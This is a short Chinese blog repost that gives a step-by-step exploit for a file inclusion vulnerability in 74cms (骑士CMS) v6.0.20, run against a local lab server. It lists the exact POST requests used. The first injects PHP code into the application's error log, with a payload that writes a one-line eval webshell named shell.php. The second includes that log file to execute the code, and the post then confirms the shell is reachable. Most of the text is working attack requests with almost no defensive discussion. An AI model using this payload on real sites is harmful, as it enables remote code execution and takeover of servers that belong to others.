其他分享
首页 > 其他分享> > 文件包含漏洞

文件包含漏洞

作者:互联网

文件包含漏洞

实例

骑士CMS文件包含漏洞

下载地址:http://www.74cms.com/download/index.html

注意:

模版写入文件

http://10.211.55.9/74cms_Home_Setup_v6.0.20/index.php?m=home&a=assign_resume_tpl

POST:
variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

日志错误路径:

C:\phpstudy\WWW\74cms_Home_Setup_v6.0.20\data\Runtime\Logs\Home

开始包含:

http://10.211.55.9/74cms_Home_Setup_v6.0.20/index.php?m=home&a=assign_resume_tpl

POST:
variable=1&tpl=data/Runtime/Logs/Home/21_01_20.log

在根目录下写入shell.php文件,内容为一句话木马,包含成功

C:\phpstudy\WWW\74cms_Home_Setup_v6.0.20\shell.php

http://10.211.55.9/74cms_Home_Setup_v6.0.20/shell.php

标签:文件,v6.0,20,包含,74cms,Setup,漏洞,Home,php
来源: https://blog.csdn.net/sinat_30599967/article/details/113796943